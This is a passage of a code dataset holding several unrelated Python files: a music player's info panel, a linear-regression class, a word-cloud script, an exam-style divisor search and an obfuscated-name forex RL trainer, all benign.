self.max_avg,\n \"max_std\": self.max_std, \"loss\": self.loss,\n \"comm\": (self.traffic / 1024 / 
1024)})\n\n","repo_name":"chooise/federated_learning","sub_path":"Algorithm/Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3291986156","text":"def deliteli(n):\n maxChet = 0\n maxNechet = 0\n m = []\n for l in range(2, int(n ** 0.5) + 1):\n if n % l == 0:\n m.append([n // l, l])\n if l % 2 == 0:\n maxChet = max(maxChet, l)\n elif l % 2 == 1:\n maxNechet = max(maxNechet, l)\n if ((n // l) % 2) == 0:\n maxChet = max(maxChet, n // l)\n elif ((n // l) % 2) == 1:\n maxNechet = max(maxNechet, n // l)\n if maxChet == 0 or maxNechet == 0:\n return [False, 0]\n A = abs(maxChet - maxNechet)\n lll = deliteliProst(A)\n if lll == 0 and str(A)[-1] == \"9\":\n return [True, A]\n return [False, 0]\n\n\ndef deliteliProst(n):\n spisok = set()\n for g in range(2, int(n ** 0.5) + 1):\n if n % g == 0:\n spisok.add(g)\n spisok.add(n // g)\n return len(list(spisok))\nk = 0\nfor i in range(250157, 10000000):\n jjj = deliteli(i)\n if k == 5:\n break\n if jjj[0]:\n print(i, jjj[1])\n k += 1","repo_name":"olgaObnosova/EGE","sub_path":"№25/4210.py","file_name":"4210.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73116505512","text":"'''\nCreated on Sep 23, 2010\n\n@author: ivan\n'''\nimport os\nimport copy\nimport logging\nimport threading\n\nfrom gi.repository import Gtk\nfrom gi.repository import GLib\n\nfrom foobnix.fc.fc import FC\nfrom foobnix.gui.model import FModel\nfrom foobnix.gui.state import LoadSave\nfrom foobnix.helpers.image import ImageBase\nfrom foobnix.helpers.textarea import TextArea\nfrom foobnix.gui.model.signal import FControl\nfrom foobnix.helpers.my_widgets import EventLabel\nfrom foobnix.helpers.pref_widgets import HBoxDecoratorTrue, FrameDecorator\nfrom foobnix.fc.fc_cache import FCache, COVERS_DIR, LYRICS_DIR\nfrom foobnix.gui.treeview.simple_tree import SimpleTreeControl\nfrom foobnix.util import idle_task\nfrom foobnix.util.const import FTYPE_NOT_UPDATE_INFO_PANEL, \\\n ICON_BLANK_DISK, SITE_LOCALE\nfrom foobnix.util.bean_utils import update_parent_for_beans, \\\n update_bean_from_normalized_text\nfrom foobnix.thirdparty.lyr import get_lyrics\nfrom foobnix.gui.service.lyrics_parsing_service import get_lyrics_by_parsing\nfrom foobnix.util.id3_util import get_image_for_bean\n\n\nclass InfoCache():\n def __init__(self):\n self.best_songs_bean = None\n self.similar_tracks_bean = None\n self.similar_artists_bean = None\n self.similar_tags_bean = None\n self.lyric_bean = None\n self.wiki_artist = None\n\n self.active_method = None\n\n\nclass InfoPanelWidget(Gtk.Frame, LoadSave, FControl):\n def __init__(self, controls):\n Gtk.Frame.__init__(self)\n FControl.__init__(self, controls)\n\n self.album_label = Gtk.Label.new(None)\n self.album_label.set_line_wrap(True)\n self.album_label.set_markup(\"\")\n self.set_label_widget(self.album_label)\n\n self.empty = TextArea()\n\n self.best_songs = SimpleTreeControl(_(\"Best Songs\"), controls)\n self.best_songs.line_title = EventLabel(self.best_songs.get_title(), func=self.show_current,\n arg=self.best_songs, func1=self.show_best_songs)\n\n self.artists = SimpleTreeControl(_(\"Similar Artists\"), controls)\n self.artists.line_title = EventLabel(self.artists.get_title(), func=self.show_current,\n arg=self.artists, func1=self.show_similar_artists)\n\n self.tracks = SimpleTreeControl(_(\"Similar Songs\"), 
controls)\n self.tracks.line_title = EventLabel(self.tracks.get_title(), func=self.show_current,\n arg=self.tracks, func1=self.show_similar_tracks)\n\n self.tags = SimpleTreeControl(_(\"Similar Tags\"), controls)\n self.tags.line_title = EventLabel(self.tags.get_title(), func=self.show_current,\n arg=self.tags, func1=self.show_similar_tags)\n\n self.lyrics = TextArea()\n lyric_title = _(\"Lyrics\")\n self.lyrics.set_text(\"\", lyric_title)\n self.lyrics.line_title = EventLabel(lyric_title, func=self.show_current,\n arg=self.lyrics, func1=self.show_similar_lyrics)\n\n \"\"\"wiki\"\"\"\n wBox = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n wiki_title = _(\"About Artist\")\n self.wiki = TextArea()\n\n wBox.line_title = EventLabel(wiki_title, func=self.show_current, arg=wBox, func1=self.show_wiki_info)\n\n \"\"\"info\"\"\"\n self.last_fm_label = Gtk.LinkButton.new_with_label(\"http://www.last.fm\", \"Last.Fm\")\n self.wiki_label = Gtk.LinkButton.new_with_label(\"http://www.wikipedia.org\", \"Wikipedia\")\n info_line = HBoxDecoratorTrue(self.last_fm_label, self.wiki_label)\n info_frame = FrameDecorator(_(\"Info\"), info_line, 0.5, 0.5)\n\n \"\"\"downloads\"\"\"\n self.exua_label = Gtk.LinkButton.new_with_label(\"http://www.ex.ua\", \"EX.ua\")\n self.rutracker_label = Gtk.LinkButton.new_with_label(\"http://rutracker.org\", \"Rutracker\")\n dm_line = HBoxDecoratorTrue(self.exua_label, self.rutracker_label)\n dm_frame = FrameDecorator(_(\"Downloads\"), dm_line, 0.5, 0.5)\n\n self.wiki = TextArea()\n self.wiki.set_text(\"\", wiki_title)\n\n wBox.pack_start(HBoxDecoratorTrue(info_frame, dm_frame), False, False, 0)\n wBox.pack_start(self.wiki, True, True, 0)\n\n wBox.scroll = wBox\n\n self.vpaned_small = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n\n \"\"\"image and similar artists\"\"\"\n ibox = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 0)\n self.image = ImageBase(ICON_BLANK_DISK, FC().info_panel_image_size)\n\n lbox = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n\n self.left_widget = [wBox, self.artists, self.tracks, self.tags, self.lyrics, self.best_songs]\n\n for l_widget in self.left_widget:\n lbox.pack_start(l_widget.line_title, True, True, 0)\n\n ibox.pack_start(self.image, False, False, 0)\n ibox.pack_start(lbox, True, True, 0)\n\n \"\"\"image and similar artists\"\"\"\n sbox = Gtk.Box.new(Gtk.Orientation.VERTICAL, 0)\n\n for l_widget in self.left_widget:\n sbox.pack_start(l_widget.scroll, True, True, 0)\n\n sbox.pack_end(self.empty.scroll, True, True, 0)\n\n self.vpaned_small.pack_start(ibox, False, False, 0)\n self.vpaned_small.pack_start(sbox, True, True, 0)\n\n self.add(self.vpaned_small)\n\n self.bean = None\n self.info_cache = InfoCache()\n self.update_lock = threading.Lock()\n self.clear()\n\n @idle_task\n def show_current(self, widget):\n if not self.controls.net_wrapper.is_internet():\n return\n\n self.empty.hide()\n if widget.line_title.selected:\n widget.scroll.hide()\n self.empty.show()\n widget.line_title.set_not_active()\n return\n\n for w in self.left_widget:\n w.scroll.hide()\n w.line_title.set_not_active()\n\n widget.scroll.show_all()\n widget.line_title.set_active()\n\n self.info_cache.active_method = widget.line_title.func1\n self.controls.in_thread.run_with_spinner(widget.line_title.func1)\n\n def clear(self):\n self.image.set_no_image()\n self.tracks.clear_tree()\n self.tags.clear_tree()\n self.artists.clear_tree()\n self.lyrics.set_text(\"\", _(\"Lyrics\"))\n\n def update_info_panel(self):\n if not self.controls.net_wrapper.is_internet() or not self.bean:\n return\n\n bean = 
copy.copy(self.bean)\n\n        def update_info_panel_task():\n            self.update_lock.acquire()\n            try:\n                self.show_album_title(bean)\n                self.show_disc_cover(bean)\n                if self.controls.coverlyrics.get_property(\"visible\"):\n                    try:\n                        self.show_similar_lyrics(bean)\n                    except Exception as e:\n                        logging.error(\"Can't get lyrics. \" + type(e).__name__ + \": \" + str(e))\n                if self.info_cache.active_method:\n                    self.info_cache.active_method()\n            except:\n                pass\n            self.update_lock.release()\n\n        threading.Thread(target=update_info_panel_task).start()\n\n    def update(self, bean):\n        if bean.type == FTYPE_NOT_UPDATE_INFO_PANEL:\n            return False\n\n        self.clear()\n\n        if not self.controls.net_wrapper.is_internet():\n            return\n\n        if not FC().is_view_info_panel:\n            logging.debug(\"Info panel disabled\")\n            return\n\n        \"\"\"check connection\"\"\"\n        if not self.controls.lastfm_service.connect():\n            return\n\n        \"\"\"update bean info from text if possible\"\"\"\n        bean = update_bean_from_normalized_text(bean)\n\n        if not bean.artist or not bean.title:\n            logging.debug(\"Artist and title not defined\")\n\n        self.bean = bean\n\n        self.update_info_panel()\n\n    def show_album_title(self, bean=None):\n        if not bean:\n            bean = self.bean\n        if bean.UUID != self.bean.UUID:\n            return\n\n        \"\"\"update info album and year\"\"\"\n        info_line = bean.artist\n        if bean.text in FCache().album_titles:\n            info_line = FCache().album_titles[bean.text]\n        else:\n            album_name = self.controls.lastfm_service.get_album_name(bean.artist, bean.title)\n            album_year = self.controls.lastfm_service.get_album_year(bean.artist, bean.title)\n            if album_name:\n                info_line = album_name\n            if album_name and album_year:\n                info_line = album_name + \" (\" + album_year + \")\"\n\n        if isinstance(info_line, str):\n            FCache().album_titles[bean.text] = info_line\n        if info_line and bean.UUID == self.bean.UUID:\n            info_line = info_line.replace('&', '&amp;')\n            GLib.idle_add(self.album_label.set_markup, \"<b>%s</b>\" % info_line)\n            GLib.idle_add(self.controls.coverlyrics.album_title.set_markup, \"<b>%s</b>\" % info_line)\n\n    def show_disc_cover(self, bean=None):\n        if not bean:\n            bean = self.bean\n        if bean.UUID != self.bean.UUID:\n            return\n\n        \"\"\"update image\"\"\"\n        if not bean.image:\n            if not os.path.isdir(COVERS_DIR):\n                os.mkdir(COVERS_DIR)\n            bean.image = get_image_for_bean(bean, self.controls)\n\n        if not bean.image:\n            logging.warning(\"\"\"\"\"Can't get cover image. 
Check the correctness of the artist's name and track title\"\"\"\"\")\n\n if bean.UUID == self.bean.UUID:\n self.image.update_info_from(bean)\n self.controls.trayicon.update_info_from(bean)\n self.controls.coverlyrics.set_cover()\n\n def show_similar_lyrics(self, bean=None):\n if not bean:\n bean = self.bean\n if not bean:\n return\n if bean.UUID != self.bean.UUID:\n return\n\n \"\"\"lyrics\"\"\"\n if not os.path.isdir(LYRICS_DIR):\n os.mkdir(LYRICS_DIR)\n\n cache_name = lyrics_title = \"%s - %s\" % (bean.artist, bean.title)\n\n illegal_chars = [\"/\", \"#\", \";\", \":\", \"%\", \"*\", \"&\", \"\\\\\"]\n for char in illegal_chars:\n cache_name = cache_name.replace(char, \"_\")\n cache_name = cache_name.lower().strip()\n\n text = None\n\n if os.path.exists(os.path.join(LYRICS_DIR, cache_name)):\n with open(os.path.join(LYRICS_DIR, cache_name), 'r') as cache_file:\n text = \"\".join(cache_file.readlines())\n else:\n self.lyrics.set_text(_(\"Loading...\"), lyrics_title)\n try:\n logging.debug(\"Try to get lyrics from lyrics.wikia.com\")\n text = get_lyrics(bean.artist, bean.title)\n except:\n logging.info(\"Error occurred when getting lyrics from lyrics.wikia.com\")\n if not text:\n text = get_lyrics_by_parsing(bean.artist, bean.title)\n if text:\n with open(os.path.join(LYRICS_DIR, cache_name), 'w') as cache_file:\n cache_file.write(text)\n else:\n logging.info(\"The text not found\")\n text = _(\"The text not found\")\n if bean.UUID == self.bean.UUID:\n self.set_lyrics(text, lyrics_title)\n\n def show_wiki_info(self):\n if not self.bean:\n return\n if self.info_cache.wiki_artist == self.bean.artist:\n return None\n self.info_cache.wiki_artist = self.bean.artist\n\n self.wiki_label.set_uri(\"http://%s.wikipedia.org/w/index.php?&search=%s\" % (SITE_LOCALE, self.bean.artist))\n self.last_fm_label.set_uri(\"http://www.last.fm/search?q=%s\" % self.bean.artist)\n\n self.exua_label.set_uri(\"http://www.ex.ua/search?s=%s\" % self.bean.artist)\n self.rutracker_label.set_uri(\"http://rutracker.org/forum/tracker.php?nm=%s\" % self.bean.artist)\n\n artist = self.controls.lastfm_service.get_network().get_artist(self.bean.artist)\n self.wiki.set_text(artist.get_bio_summary(), self.bean.artist)\n\n# Deprecated\n# images = artist.get_images(limit=6)\n#\n# for image in images:\n# try:\n# url = image.sizes.large\n# except AttributeError:\n# url = image.sizes[\"large\"]\n# self.wiki.append_image(url)\n\n def show_similar_tags(self):\n if self.info_cache.similar_tags_bean == self.bean:\n return None\n self.info_cache.similar_tags_bean = self.bean\n\n \"\"\"similar tags\"\"\"\n similar_tags = self.controls.lastfm_service.search_top_similar_tags(self.bean.artist, self.bean.title)\n parent = FModel(_(\"Similar Tags:\") + \" \" + self.bean.title)\n update_parent_for_beans(similar_tags, parent)\n self.tags.populate_all([parent] + similar_tags)\n\n def show_similar_tracks(self):\n if self.info_cache.similar_tracks_bean == self.bean:\n return None\n self.info_cache.similar_tracks_bean = self.bean\n\n \"\"\"similar songs\"\"\"\n similar_tracks = self.controls.lastfm_service.search_top_similar_tracks(self.bean.artist, self.bean.title)\n parent = FModel(_(\"Similar Tracks:\") + \" \" + self.bean.title)\n update_parent_for_beans(similar_tracks, parent)\n self.tracks.populate_all([parent] + similar_tracks)\n\n def show_similar_artists(self):\n if self.info_cache.similar_artists_bean == self.bean:\n return None\n self.info_cache.similar_artists_bean = self.bean\n\n \"\"\"similar artists\"\"\"\n if self.bean.artist:\n 
similar_artists = self.controls.lastfm_service.search_top_similar_artist(self.bean.artist)\n parent = FModel(_(\"Similar Artists:\") + \" \" + self.bean.artist)\n update_parent_for_beans(similar_artists, parent)\n self.artists.populate_all([parent] + similar_artists)\n\n def show_best_songs(self):\n if self.info_cache.best_songs_bean == self.bean:\n return None\n\n self.info_cache.best_songs_bean = self.bean\n\n best_songs = self.controls.lastfm_service.search_top_tracks(self.bean.artist)\n parent = FModel(_(\"Best Songs:\") + \" \" + self.bean.artist)\n update_parent_for_beans(best_songs, parent)\n self.best_songs.populate_all([parent] + best_songs)\n\n @idle_task\n def set_lyrics(self, text, title):\n self.lyrics.set_text(text, title)\n self.controls.coverlyrics.lyrics.set_text(text, title)\n\n def on_load(self):\n for w in self.left_widget:\n w.scroll.hide()\n w.line_title.set_not_active()\n self.empty.show()\n FCache().on_load()\n\n def on_save(self):\n pass\n\n def on_quit(self):\n FCache().on_quit()\n","repo_name":"foobnix/foobnix","sub_path":"foobnix/gui/infopanel.py","file_name":"infopanel.py","file_ext":"py","file_size_in_byte":14676,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"10096666645","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom fawad_torch.nn import Linear\nfrom losses.mse_loss import MSELoss\nimport fawad_torch.optimizers as optim\n\nclass LinearRegression:\n def __init__(self):\n self.linear_layer = None\n self.loss = MSELoss()\n self.optimizer = None\n self.losses = []\n self.val_losses = []\n self.mean_x, self.mean_y = None, None\n\n def step(self, gen, train=True):\n try:\n x_batch, y_batch = next(gen)\n y_preds_batch = self.linear_layer.forward(x_batch)\n loss = self.loss.forward(y_preds_batch, y_batch)\n grad = None\n if train:\n loss_grad = self.loss.backward()\n grad = self.linear_layer.backward(loss_grad)\n return loss, grad\n except:\n raise Exception()\n \n def normalize_data(self, x, y, validation=False):\n if validation:\n if self.mean_x is None or self.mean_y is None:\n raise Exception(\"Training data must be normalized first to store mean and standard deviation\")\n elif not validation:\n self.mean_x, self.std_x = x.mean(axis=0), x.std(axis=0)\n self.mean_y, self.std_y = y.mean(axis=0), y.std(axis=0)\n x_norm = (x - self.mean_x) / (self.std_x + np.finfo(float).eps)\n y_norm = (y - self.mean_y) / (self.std_y + np.finfo(float).eps)\n return (x_norm, y_norm)\n \n \n def batch_generator(self, x, y, batch_size):\n if batch_size is None:\n yield x, y\n return\n index = 0\n while index + batch_size <= x.shape[0]:\n batch = (x[index: index+batch_size], y[index: index+batch_size])\n index += batch_size\n yield batch\n batch = (x[index: index + x.shape[0] % batch_size], y[index: index + y.shape[0] % batch_size])\n yield batch\n\n def fit(self, x_train, y_train, x_val=None, y_val=None, learning_rate=1e-9, epochs=300, batch_size=32, normal_eq=False, bias=True):\n self.bias = bias\n val = False\n if (x_val is None and y_val is not None) or (x_val is not None and y_val is None):\n raise Exception(\"x_val and y_val need to be provided together\")\n elif not (x_val is None or y_val is None):\n val = True\n self.val = val\n x_train, y_train = self.normalize_data(x_train, y_train)\n if val:\n x_val, y_val = self.normalize_data(x_val, y_val, validation=True)\n if normal_eq:\n if bias:\n x_train = np.hstack([np.ones((x_train.shape[0], 1)), x_train])\n self.linear_layer = 
Linear(in_features=x_train.shape[1], out_features=y_train.shape[1], bias=bias)\n self.linear_layer.w = np.dot(np.linalg.pinv(np.dot(x_train.T, x_train)), np.dot(x_train.T, y_train))\n else:\n self.linear_layer = Linear(in_features=x_train.shape[1], out_features=y_train.shape[1], bias=bias)\n self.optimizer = optim.SGD(learning_rate)\n self.losses = []\n if val:\n self.val_losses = []\n for e in range(epochs):\n train_gen = self.batch_generator(x_train, y_train, batch_size)\n losses = []\n while True:\n try:\n loss, grad = self.step(train_gen)\n loss = loss[0]\n if not np.isnan(loss):\n self.linear_layer.w = self.optimizer.step(self.linear_layer.w, grad)\n losses.append(loss)\n if val:\n val_gen = self.batch_generator(x_val, y_val, batch_size)\n val_losses = []\n while True:\n try:\n val_loss, _ = self.step(val_gen)\n val_loss = val_loss[0]\n if not np.isnan(val_loss):\n val_losses.append(val_loss)\n except:\n break\n avg_val_loss = np.array(val_losses).mean()\n self.val_losses.append(avg_val_loss)\n except:\n break\n avg_loss = np.array(losses).mean()\n self.losses.append(avg_loss)\n print(f\"Epoch: {e+1}/{epochs}\\nTraining Loss: {self.losses[-1]}\")\n if val:\n print(f\"Validation Loss: {self.val_losses[-1]}\\n\")\n print(f\"Final Loss: {self.losses[-1]}\")\n if val:\n print(f\"Final Validation Loss: {self.val_losses[-1]}\")\n\n def plot(self):\n if len(self.losses) <= 0:\n print(\"Unable to plot losses as there are no losses recorded\")\n else:\n plt.figure() # Create a new figure\n plt.plot(range(len(self.losses)), self.losses)\n plt.title(\"Training Loss\")\n plt.savefig(\"examples/linear_regression/training_loss.png\")\n if self.val:\n if len(self.val_losses) <= 0:\n print(\"Unable to plot losses as there are no losses recorded\")\n else:\n plt.figure()\n plt.plot(range(len(self.val_losses)), self.val_losses)\n plt.title(\"Validation Loss\")\n plt.savefig(\"examples/linear_regression/validation_loss.png\")\n plt.show()\n\n def predict(self, x):\n if self.linear_layer.w is None:\n print(\"Model not fit yet.\")\n return\n return self.linear_layer.forward(x)","repo_name":"FawadAhmed322/ML-Playground","sub_path":"models/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26373676508","text":"#!/usr/bin/env python3\n\nimport wordcloud\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nimport os\nimport sys\n\nos.chdir(sys.path[0])\n\n#Let your text file be the first argument in the command line.\n#A PowerShell example:\n#python wordcloud_example.py RomeoandJuliet.txt heart.jpeg\n#My first argument is my desired text and the second argument is my mask\n\ntext = open(sys.argv[1], 'r', encoding='utf-8').read()\n\ndef calculate_frequencies(text):\n\n#I needed my own list of uninteresting words to remove from my WordCloud and customize it for different texts that I used. 
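Returning briefly to the LinearRegression record above: when normal_eq=True it solves the least-squares problem in closed form with a pseudoinverse. A standalone, hedged sketch of that core computation on synthetic data (no bias column; all names here are illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 3))                  # 100 samples, 3 features
true_w = np.array([[2.0], [-1.0], [0.5]])
y = X @ true_w + 0.01 * rng.normal(size=(100, 1))

# Normal equations: w = (X^T X)^+ X^T y, using pinv for numerical
# robustness, mirroring the np.linalg.pinv(...) line in the record above.
w = np.linalg.pinv(X.T @ X) @ (X.T @ y)
print(np.round(w, 2))                          # close to true_w
```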
\n#You are more than welcome to remove or append the words that you don't want the WC to show.\n\n uninteresting_words = [\"romeo\",\"laur\",\"pet\",\"mus\",\"nurse\",\"mer\",\"wife\",\"jul\",\"serv\",\"par\",\"rom\",\"mon\",\"cap\",\"officer\",\"tyb\",\"ben\",\"abr\",\"greg\",\"samp\",\"chor\",\"the\", \"however\", \"hundred\", \"kept\", \"saying\", \"may\", \"come\", \"either\", \"rather\",\n \"up\", \"every\", \"though\", \"thus\", \"since\", \"before\", \"most\", \"than\", \"about\", \"put\", \"these\", \"then\", \"say\",\n \"because\", \"therefore\", \"off\", \"could\", \"into\", \"having\", \"on\", \"take\", \"after\", \"said\", \"on\", \"himself\", \"men\",\n \"should\", \"upon\", \"other\", \"out\", \"only\", \"now\", \"many\", \"so\", \"yet\", \"not\", \"one\", \"for\", \"would\", \"made\", \"those\",\n \"there\", \"a\", \"in\", \"to\", \"if\", \"is\", \"it\", \"of\", \"and\", \"or\", \"an\", \"as\", \"i\", \"me\", \"my\", \"none\", \"once\", \"large\", \"set\", \"indeed\", \"shall\", \"number\",\n \"we\", \"our\", \"ours\", \"you\", \"your\", \"yours\", \"he\", \"she\", \"him\", \"his\", \"her\", \"hers\", \"its\", \"they\", \"them\",\n \"their\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"am\", \"are\", \"was\", \"were\", \"be\", \"been\", \"being\",\n \"have\", \"has\", \"had\", \"do\", \"does\", \"did\", \"but\", \"at\", \"by\", \"with\", \"from\", \"here\", \"when\", \"where\", \"how\",\n \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"some\", \"such\", \"no\", \"nor\", \"too\", \"very\", \"can\", \"will\", \"just\"]\n sentence = \"\"\n interesting_words = []\n dict_count = {}\n#Remove the punctuation from the text and generate a list of words:\n for x in text:\n if x.isalpha() or x == \" \":\n sentence += x.lower()\n\n#Remove the uninteresting words from the list of words so we are left with only\n#interesting words.\n\n for word in sentence.split():\n if word not in uninteresting_words:\n interesting_words.append(word)\n\n#We add the interesting words to the dictionary\n\n for word in interesting_words:\n if word not in dict_count:\n dict_count[word] = 0\n dict_count[word] += 1\n\n#The mask will be the second argument in the command line \n\n custom_mask = np.array(Image.open(sys.argv[2]))\n\n#Generate a wordcloud from our dictionary. You may determine the background color and if you chose not to have a mask you can remove it below. There are other parameters you can adjust and I recommend you check the documentation.\n\n cloud = wordcloud.WordCloud(background_color = 'white', mask = custom_mask)\n cloud.generate_from_frequencies(dict_count)\n\n#The interpolation will adjust the smoothness of our image. 
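The hand-rolled counting loop in calculate_frequencies above (strip punctuation, drop stop words, tally into a dict) has a compact equivalent built on collections.Counter. A hedged sketch with a tiny stand-in stop-word list:

```python
from collections import Counter

def word_frequencies(text, stop_words=frozenset({"the", "a", "and", "of"})):
    # Keep only letters and spaces, lowercase, then split into words.
    cleaned = "".join(c.lower() for c in text if c.isalpha() or c == " ")
    return Counter(w for w in cleaned.split() if w not in stop_words)

print(word_frequencies("The cat and the hat").most_common(2))
# [('cat', 1), ('hat', 1)]
```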
You may choose your own and see what it might \n#look like in the documentation(https://matplotlib.org/stable/gallery/images_contours_and_fields/interpolation_methods.html)\n#Let's remove the x and y axis that would otherwise appear on our image.\n#We can see the WC image with plt.show().\n\n plt.imshow(cloud, interpolation = 'bilinear')\n plt.axis('off')\n plt.show()\n\ncalculate_frequencies(text)\n","repo_name":"MarkoM-dot/WordCloud","sub_path":"wordcloud_example.py","file_name":"wordcloud_example.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17979499225","text":"from lib.Market import Market\nOg=dict\nOQ=len\nOY=False\nOU=True\nOV=open\nfrom lib.Record import Record\nfrom lib.OrderManager import OrderManager\nfrom lib.Trader import SureFireTrader\nfrom lib.Series2GAF import gaf_encode\nfrom tensorforce.agents.constant_agent import ConstantAgent\nfrom tqdm import tqdm,trange\nimport matplotlib.pyplot as plt\nimport numpy as np\nOw=np.abs\nOn=np.stack\nimport logging\nOx=logging.warning\nOt=logging.info\nimport json\nimport os\nOp=os.makedirs\nOl=os.path\nimport pickle\nON=pickle.dump\nplt.style.use('ggplot')\nOm='EURUSD'\ndef OF():\n OI=Market(data_path=\"data/%s_Candlestick_4_Hour_BID_01.08.2018-30.11.2018.csv\"%Om)\n Oa=Record()\n Oo=OrderManager(market=OI,record=Oa)\n OS=SureFireTrader(orderManager=Oo)\n OP=[20,25,30]\n OH=['BUY','SELL']\n Oy=[2,3,4]\n Oc=12\n OR=ConstantAgent(states=Og(type='float',shape=(Oc,Oc,4)),actions=Og(SLTP_pips=Og(type='int',num_actions=OQ(OP)),start_order_type=Og(type='int',num_actions=OQ(OH)),max_level_limit=Og(type='int',num_actions=OQ(Oy))),action_values={'SLTP_pips':0,'max_level_limit':0,'start_order_type':0})\n if not Ol.exists(\"save_model/constant/trades\"):\n Op(\"save_model/constant/trades\")\n if not Ol.exists('save_model/constant/0000'):\n Op('save_model/constant/0000')\n OR.save_model('save_model/constant/0000/model')\n OM=[]\n OW=[]\n OL=[]\n Os=0\n OX=0\n OB=OY\n OK=12\n Oa.reset()\n Oo.reset()\n OI.reset(start_index=Oc)\n OD=tqdm()\n while(OI.next()):\n OD.update(1)\n Oo.orders_check()\n OJ,Oz=OS.status_check()\n Oj=OI.get_ohlc(size=Oc)\n Ok=OI.get_indicators(size=Oc)\n O,H,L,C=gaf_encode(Oj['Open']),gaf_encode(Oj['High']), gaf_encode(Oj['Low']),gaf_encode(Oj['Close'])\n Or=On((O,H,L,C),axis=-1)\n if OJ=='TRADE_OVER':\n if OI.get_current_index()>Oc:\n Of=(Oa.get_net_profit()-OW[-1])/OI.get_pip()\n Ov=1.0-0.1*OQ(Oz)\n if Of>0:\n Ou=Of*Ov\n else:\n if OQ(Oz)==0:\n Ou=0\n else:\n Ou=-Ow(Oz[0]['TP']-Oz[0]['price'])/OI.get_pip()\n if OI.get_current_index()>=OI.get_data_length()-OK*Oy[-1]:\n OB=OU\n OR.observe(reward=Ou,terminal=OB)\n OL.append(Ou)\n if OB==OU:\n OD.close()\n OM.append(OL)\n break\n OT=OR.act(Or)\n OE=OP[OT['SLTP_pips']]*2\n OG=OP[OT['SLTP_pips']]\n OS.set_max_level(Oy[OT['max_level_limit']])\n Oq=OH[OT['start_order_type']]\n OS.new_trade(SL_pip=OE,TP_pip=OG,start_order_type=Oq)\n OX+=1\n Os=0\n Ot(\"NewTradeStarted: current net profit=%f (price@%f)\"%(Oa.get_net_profit(),OI.get_market_price()))\n elif OJ=='ADD_ORDER':\n OA=OS.get_orders_detail()[-1]\n if OA['order_type']=='BUY':\n Oi=OA['price']-OI.get_pip(OG)\n elif OA['order_type']=='SELL':\n Oi=OA['price']+OI.get_pip(OG)\n OS.add_reverse_order(price=Oi,SL_pip=OE,TP_pip=OG)\n Os=0\n elif OJ=='ERROR':\n Ox(\"SureFireError: order issues...\")\n elif OJ=='NONE':\n Os+=1\n if Os>=OK:\n Of=(Oa.get_net_profit()-OW[-1])/OI.get_pip()\n Ov=1.0-0.1*OQ(Oz)\n if Of>0:\n Ou=Of*Ov\n 
else:\n if OQ(Oz)==0:\n Ou=0\n else:\n Ou=-Ow(Oz[0]['TP']-Oz[0]['price'])/OI.get_pip()\n if OI.get_current_index()>=OI.get_data_length()-OK*Oy[-1]:\n OB=OU\n OR.observe(reward=Ou,terminal=OB)\n OL.append(Ou)\n if OB==OU:\n OD.close()\n OM.append(OL)\n break\n OT=OR.act(Or)\n OE=OP[OT['SLTP_pips']]*2\n OG=OP[OT['SLTP_pips']]\n OS.set_max_level(Oy[OT['max_level_limit']])\n Oq=OH[OT['start_order_type']]\n OS.new_trade(SL_pip=OE,TP_pip=OG,start_order_type=Oq)\n Os=0\n Ot(\"NewTradeStarted: current net profit=%f (price@%f)\"%(Oa.get_net_profit(),OI.get_market_price()))\n OW.append(Oa.get_net_profit())\n with OV('save_model/constant/trades/episode_0000.pkl','wb')as f:\n ON(Oa.get_history(),f,protocol=-1)\n with OV('save_model/constant/trades/profit_history.pkl','wb')as f:\n ON(OW,f,protocol=-1)\n with OV('save_model/constant/trades/reward_history.pkl','wb')as f:\n ON(OM,f,protocol=-1)\n Oa.show_details()\nif __name__==\"__main__\":\n OF()","repo_name":"RainBoltz/rlfxer","sub_path":"source code/trainer_baseline.py","file_name":"trainer_baseline.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"5109468607","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport os.path\n\nimport ctools\nimport ctools.tydoc as tydoc\nfrom tydoc import TyTag\n\nLOCALHOST_CDN = False\nLOCAL_CDN = False\nREQUIRED = ['https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/themes/smoothness/jquery-ui.css',\n 'https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js',\n 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js',\n 'demo.css',\n 'optimizer.js',\n 'demo.js']\n\nSCENARIOS = [ ('1,2,3,4,5,6,101,102,103,104,105,106','Balanced rural and urban blocks'),\n ('1,2,3,400,5,6,101,102,103,104,105,106','One rural block with a LOT of males.'),\n ('1,2,3,4,5,6,101,102,103,104,600,106','One urban block with a LOT of females.'),\n ('1,2,3,4,5,6,101,102,103,104,1,106','One urban block with just one female'),\n ]\n\nclass MatrixMaker:\n def __init__(self,id_prefix,editable=True):\n self.id_prefix = id_prefix\n self.editable = editable;\n\n def pop_data_fields(self, name, level, f=None, m=None ):\n d1 = TyTag('div', attrib={'class':'dataline1'})\n d1t = TyTag('span', text=f'{name} pop: ', attrib={'class':'datalabel'})\n d1d = TyTag('span', text='tbd', attrib={'class':'data', 'id':self.id_prefix+level+\"-pop\"})\n d1.extend([d1t,d1d])\n\n d2 = TyTag('div', 